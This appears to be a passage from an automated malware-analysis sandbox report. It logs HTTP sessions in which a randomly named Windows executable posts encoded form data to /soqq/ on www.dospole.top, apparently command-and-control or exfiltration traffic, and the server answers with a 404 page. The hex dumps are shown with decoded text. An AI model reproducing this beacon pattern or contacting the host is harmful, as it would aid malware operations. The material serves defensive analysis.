                                    Data Raw: 62 42 3d 51 70 6d 76 72 31 36 34 53 59 42 43 35 42 49 6a 55 69 46 2b 43 4e 79 35 73 35 54 6c 4a 73 34 6d 30 65 44 2f 45 70 2f 71 5a 51 54 58 45 4e 64 2b 35 67 70 4e 53 38 4d 31 66 34 2f 45 37 6b 41 36 53 6a 4d 36 43 4e 34 51 4a 4f 6d 6d 47 7a 50 75 37 69 2f 57 79 36 78 4c 54 30 2b 78 4b 32 34 71 59 42 56 50 4e 68 45 61 70 76 51 48 41 44 48 44 6a 41 34 74 31 73 75 51 6e 4a 43 53 53 48 54 73 55 75 39 4f 42 4c 30 54 67 74 67 44 66 45 38 41 7a 68 79 75 51 58 6c 34 45 48 71 59 58 57 76 79 73 66 45 45 37 30 34 68 65 4a 75 6c 63 4b 39 77 48 50 33 70 77 64 75 41 43 6a 46 56 4f 4b 41 33 51 6f 6d 44 6c 64 6c 59 49 33 77 4d
                                    Data Ascii: bB=Qpmvr164SYBC5BIjUiF+CNy5s5TlJs4m0eD/Ep/qZQTXENd+5gpNS8M1f4/E7kA6SjM6CN4QJOmmGzPu7i/Wy6xLT0+xK24qYBVPNhEapvQHADHDjA4t1suQnJCSSHTsUu9OBL0TgtgDfE8AzhyuQXl4EHqYXWvysfEE704heJulcK9wHP3pwduACjFVOKA3QomDldlYI3wM
                                    Jul 11, 2024 15:07:45.734488964 CEST1236INHTTP/1.1 404 Not Found
                                    Date: Thu, 11 Jul 2024 13:07:45 GMT
                                    Server: Apache
                                    Content-Length: 16052
                                    Connection: close
                                    Content-Type: text/html
                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                    Jul 11, 2024 15:07:45.734533072 CEST1236INData Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                                    Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
                                    Jul 11, 2024 15:07:45.734566927 CEST1236INData Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d
                                    Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
                                    Jul 11, 2024 15:07:45.734708071 CEST1236INData Raw: 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66
                                    Data Ascii: 0.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <pa
                                    Jul 11, 2024 15:07:45.734741926 CEST1236INData Raw: 32 2c 31 35 2e 35 30 30 36 34 20 30 2e 39 31 36 37 39 38 2c 36 2e 38 33 34 33 34 20 32 2e 32 34 39 38 35 34 2c 31 36 2e 33 33 32 33 37 20 33 2e 34 39 39 39 30 32 2c 32 34 2e 39 31 36 30 34 20 31 2e 32 35 30 30 34 37 2c 38 2e 35 38 33 36 38 20 32
                                    Data Ascii: 2,15.50064 0.916798,6.83434 2.249854,16.33237 3.499902,24.91604 1.250047,8.58368 2.416611,16.24967 4.583438,28.58394 2.166827,12.33427 5.333153,29.33244 8.499966,46.33323" style="display:inline;fill:none;stroke:#000000;stroke-widt
                                    Jul 11, 2024 15:07:45.734776020 CEST1236INData Raw: 35 31 2c 31 2e 35 32 31 36 35 20 30 2e 32 32 32 39 39 2c 31 2e 30 36 35 37 39 20 30 2e 31 34 39 33 33 2c 30 2e 36 30 39 31 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c
                                    Data Ascii: 51,1.52165 0.22299,1.06579 0.14933,0.60912" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4533" d=
                                    Jul 11, 2024 15:07:45.734810114 CEST1236INData Raw: 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20
                                    Data Ascii: ke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4541" d="m 85.206367,122.98266 c 0.117841,11.74369 0.235693,23.48835 0.235693,36.55072 -10e-7,13.06238 -0.117833,27.43796 -0.05891,45
                                    Jul 11, 2024 15:07:45.734882116 CEST1236INData Raw: 2c 32 36 2e 37 30 30 33 33 20 2d 32 2e 32 39 38 33 39 34 2c 36 2e 39 35 33 36 32 20 2d 32 2e 32 39 38 33 39 34 2c 31 31 2e 35 34 39 32 32 20 2d 31 2e 33 35 35 34 31 39 2c 32 34 2e 35 37 34 31 35 20 30 2e 39 34 32 39 37 34 2c 31 33 2e 30 32 34 39
                                    Data Ascii: ,26.70033 -2.298394,6.95362 -2.298394,11.54922 -1.355419,24.57415 0.942974,13.02493 2.828182,34.46917 5.066095,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-w
                                    Jul 11, 2024 15:07:45.734915972 CEST1236INData Raw: 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 39 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 31 33 32 2e 36 38 37 35 2c 32 36 33 2e 33
                                    Data Ascii: 1;" /> <path id="path4529" d="m 132.6875,263.34998 c -4.2289,18.4155 -8.45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-
                                    Jul 11, 2024 15:07:45.734951019 CEST1236INData Raw: 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 2d 72 75 6c 65 3a 6e 6f 6e 7a 65 72 6f 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 30 30 31 35 37 34 37 35 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72
                                    Data Ascii: ll-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4567"
                                    Jul 11, 2024 15:07:45.739643097 CEST1236INData Raw: 2c 30 2e 31 31 38 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65
                                    Data Ascii: ,0.1183" style="fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4578-1"


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    30192.168.2.649754162.254.38.56806784C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe
                                    TimestampBytes transferredDirectionData
                                    Jul 11, 2024 15:07:47.687247992 CEST859OUTPOST /soqq/ HTTP/1.1
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    Accept-Language: en-US,en;q=0.5
                                    Accept-Encoding: gzip, deflate
                                    Host: www.dospole.top
                                    Content-Length: 231
                                    Content-Type: application/x-www-form-urlencoded
                                    Connection: close
                                    Cache-Control: max-age=0
                                    Origin: http://www.dospole.top
                                    Referer: http://www.dospole.top/soqq/
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                    Data Raw: 62 42 3d 51 70 6d 76 72 31 36 34 53 59 42 43 34 69 67 6a 57 46 5a 2b 4b 4e 79 36 77 4a 54 6c 44 4d 34 59 30 65 66 2f 45 74 75 6e 5a 69 33 58 44 73 74 2b 72 78 70 4e 52 38 4d 31 58 59 2f 37 31 45 41 39 53 69 77 79 43 4a 34 51 4a 4f 43 6d 47 79 2f 75 36 54 2f 56 77 71 78 4a 66 55 2b 33 58 6d 34 71 59 42 56 50 4e 68 51 6b 70 76 49 48 41 79 33 44 78 52 34 75 7a 63 75 52 78 5a 43 53 57 48 53 6c 55 75 39 73 42 4b 35 34 67 76 49 44 66 47 6b 41 7a 31 6d 76 65 58 6c 36 61 33 72 51 62 57 4c 2f 69 4e 64 49 79 7a 55 56 47 65 75 30 51 63 38 71 62 38 33 4b 69 4e 4f 43 43 68 64 6e 4f 71 41 64 53 6f 65 44 33 4b 70 2f 48 44 56 76 6e 4e 34 32 37 4b 77 4c 43 35 6d 30 47 56 65 7a 31 6b 4d 68 51 41 3d 3d
                                    Data Ascii: bB=Qpmvr164SYBC4igjWFZ+KNy6wJTlDM4Y0ef/EtunZi3XDst+rxpNR8M1XY/71EA9SiwyCJ4QJOCmGy/u6T/VwqxJfU+3Xm4qYBVPNhQkpvIHAy3DxR4uzcuRxZCSWHSlUu9sBK54gvIDfGkAz1mveXl6a3rQbWL/iNdIyzUVGeu0Qc8qb83KiNOCChdnOqAdSoeD3Kp/HDVvnN427KwLC5m0GVez1kMhQA==
                                    Jul 11, 2024 15:07:48.272490025 CEST1236INHTTP/1.1 404 Not Found
                                    Date: Thu, 11 Jul 2024 13:07:48 GMT
                                    Server: Apache
                                    Content-Length: 16052
                                    Connection: close
                                    Content-Type: text/html
                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                    Jul 11, 2024 15:07:48.272509098 CEST1236INData Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                                    Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
                                    Jul 11, 2024 15:07:48.272612095 CEST1236INData Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d
                                    Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
                                    Jul 11, 2024 15:07:48.272625923 CEST1236INData Raw: 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66
                                    Data Ascii: 0.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <pa
                                    Jul 11, 2024 15:07:48.272638083 CEST1236INData Raw: 32 2c 31 35 2e 35 30 30 36 34 20 30 2e 39 31 36 37 39 38 2c 36 2e 38 33 34 33 34 20 32 2e 32 34 39 38 35 34 2c 31 36 2e 33 33 32 33 37 20 33 2e 34 39 39 39 30 32 2c 32 34 2e 39 31 36 30 34 20 31 2e 32 35 30 30 34 37 2c 38 2e 35 38 33 36 38 20 32
                                    Data Ascii: 2,15.50064 0.916798,6.83434 2.249854,16.33237 3.499902,24.91604 1.250047,8.58368 2.416611,16.24967 4.583438,28.58394 2.166827,12.33427 5.333153,29.33244 8.499966,46.33323" style="display:inline;fill:none;stroke:#000000;stroke-widt
                                    Jul 11, 2024 15:07:48.272650003 CEST1236INData Raw: 35 31 2c 31 2e 35 32 31 36 35 20 30 2e 32 32 32 39 39 2c 31 2e 30 36 35 37 39 20 30 2e 31 34 39 33 33 2c 30 2e 36 30 39 31 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c
                                    Data Ascii: 51,1.52165 0.22299,1.06579 0.14933,0.60912" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4533" d=
                                    Jul 11, 2024 15:07:48.272663116 CEST1236INData Raw: 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20
                                    Data Ascii: ke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4541" d="m 85.206367,122.98266 c 0.117841,11.74369 0.235693,23.48835 0.235693,36.55072 -10e-7,13.06238 -0.117833,27.43796 -0.05891,45
                                    Jul 11, 2024 15:07:48.272674084 CEST108INData Raw: 2c 32 36 2e 37 30 30 33 33 20 2d 32 2e 32 39 38 33 39 34 2c 36 2e 39 35 33 36 32 20 2d 32 2e 32 39 38 33 39 34 2c 31 31 2e 35 34 39 32 32 20 2d 31 2e 33 35 35 34 31 39 2c 32 34 2e 35 37 34 31 35 20 30 2e 39 34 32 39 37 34 2c 31 33 2e 30 32 34 39
                                    Data Ascii: ,26.70033 -2.298394,6.95362 -2.298394,11.54922 -1.355419,24.57415 0.942974,13.02493 2.828182,34.46917 5.0660
                                    Jul 11, 2024 15:07:48.272932053 CEST1236INData Raw: 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74
                                    Data Ascii: 95,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="pa
                                    Jul 11, 2024 15:07:48.272943974 CEST1236INData Raw: 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36 38 37 35 2c 35 35 2e 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65
                                    Data Ascii: 45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717" rx="2.5"
                                    Jul 11, 2024 15:07:48.277702093 CEST1236INData Raw: 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 31 37 30 2e 31
                                    Data Ascii: one;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4567" d="m 321.74355,168.0687 c -1e-5,3.3913 -3.42414,11.26702 -8.73834,11.26702 -5.3142,0 -18.59463,27.24606


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    31192.168.2.649755162.254.38.56806784C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe
                                    TimestampBytes transferredDirectionData
                                    Jul 11, 2024 15:07:50.276890039 CEST1872OUTPOST /soqq/ HTTP/1.1
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    Accept-Language: en-US,en;q=0.5
                                    Accept-Encoding: gzip, deflate
                                    Host: www.dospole.top
                                    Content-Length: 1243
                                    Content-Type: application/x-www-form-urlencoded
                                    Connection: close
                                    Cache-Control: max-age=0
                                    Origin: http://www.dospole.top
                                    Referer: http://www.dospole.top/soqq/
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                    Data Raw: 62 42 3d 51 70 6d 76 72 31 36 34 53 59 42 43 34 69 67 6a 57 46 5a 2b 4b 4e 79 36 77 4a 54 6c 44 4d 34 59 30 65 66 2f 45 74 75 6e 5a 69 2f 58 44 65 6c 2b 35 47 56 4e 51 38 4d 31 64 34 2f 2b 31 45 42 34 53 69 6f 2b 43 4a 38 71 4a 4d 4b 6d 41 55 6a 75 39 68 58 56 36 71 78 4a 58 30 2b 32 4b 32 35 67 59 43 39 4c 4e 68 41 6b 70 76 49 48 41 78 76 44 68 77 34 75 6f 63 75 51 6e 4a 43 6f 53 48 54 4d 55 75 6c 47 42 4b 74 4f 67 66 6f 44 63 6c 63 41 31 41 79 76 42 6e 6c 38 62 33 71 57 62 57 32 2f 69 4e 52 2b 79 32 70 43 47 5a 75 30 54 35 68 52 41 4d 72 4c 39 39 6d 7a 54 44 67 44 48 64 74 6f 58 6f 58 7a 38 4a 5a 74 5a 7a 52 37 69 59 51 74 37 4a 42 58 4c 49 69 6f 59 7a 71 6a 78 57 4e 44 43 58 58 47 6c 64 4a 31 52 4a 44 41 67 5a 39 38 48 53 31 38 4e 6a 6b 70 56 42 45 43 59 2f 30 30 54 75 32 4e 55 66 57 43 34 43 77 34 51 31 6a 38 30 76 46 58 4e 4a 39 36 36 50 76 47 37 50 6b 35 37 52 72 76 56 61 33 79 57 78 47 65 37 49 6f 7a 59 4b 66 50 6b 63 65 67 47 61 38 42 54 57 67 55 76 32 41 37 6a 63 4e 2f 6d 6f 4a 75 43 4c 75 [TRUNCATED]
                                    Data Ascii: bB=Qpmvr164SYBC4igjWFZ+KNy6wJTlDM4Y0ef/EtunZi/XDel+5GVNQ8M1d4/+1EB4Sio+CJ8qJMKmAUju9hXV6qxJX0+2K25gYC9LNhAkpvIHAxvDhw4uocuQnJCoSHTMUulGBKtOgfoDclcA1AyvBnl8b3qWbW2/iNR+y2pCGZu0T5hRAMrL99mzTDgDHdtoXoXz8JZtZzR7iYQt7JBXLIioYzqjxWNDCXXGldJ1RJDAgZ98HS18NjkpVBECY/00Tu2NUfWC4Cw4Q1j80vFXNJ966PvG7Pk57RrvVa3yWxGe7IozYKfPkcegGa8BTWgUv2A7jcN/moJuCLu41uwqnJ6B1GJNJDJNB2WzwSl1Puc/y0EHtovwcQACsZK3FO9clovroLB229lH3drviWaBf4C/Mx3WuboCzM0UXHDfGAhPoy+W4B8Pi2TA2Mj49oH7PEkDKi1NbuOAfqgWZMbFM7AcGJLPewUosYvoNwVUIFqGyMH8K2wQCRU9L4QGHaagOFqBCWOSWc+5+X9LDbgQME7Y/o19RWnnpXb1ERpKDNqnRR/g72kmQk7RadkOawDwOvzuNpKRVJtyHcrix1woi9EozHRl51CASSOMiqwO5HP2ypKbWnu4uPhSfuHbajvkZD87xPjJ9/QpJPB1ItbaJyle94OZrWgh4114Jcp20q4qR7cWiD0n3WBBab9TRTavY1XuBHyfhcix4bLluFNmdMQbg4T7h3kGGxRFYDdlZQOr798dfvUDHji0O8wx3kslKFi5WwrftcmHFC6tM5Ie14aXOtyeWGPwkzkPLbmhbFii7uKMv4duwONGbS18ZOD0NMHKfwW2enbehhTvlRkirtdDUPYskBO9y/as4ZDXIbY/X9YZUz46PMyPPjNCIWIhQYFvBSIOYVOWo+QAN2HvIofKvV1yv0CySvbVSQIZccbaPhRlxddM2rQUPmpB/1ha5CUBOhjXgHwf+4lJdTXuw9Vdmrzl76OaPlXDm6guotfvAbRXI [TRUNCATED]
                                    Jul 11, 2024 15:07:50.859935045 CEST1236INHTTP/1.1 404 Not Found
                                    Date: Thu, 11 Jul 2024 13:07:50 GMT
                                    Server: Apache
                                    Content-Length: 16052
                                    Connection: close
                                    Content-Type: text/html
                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
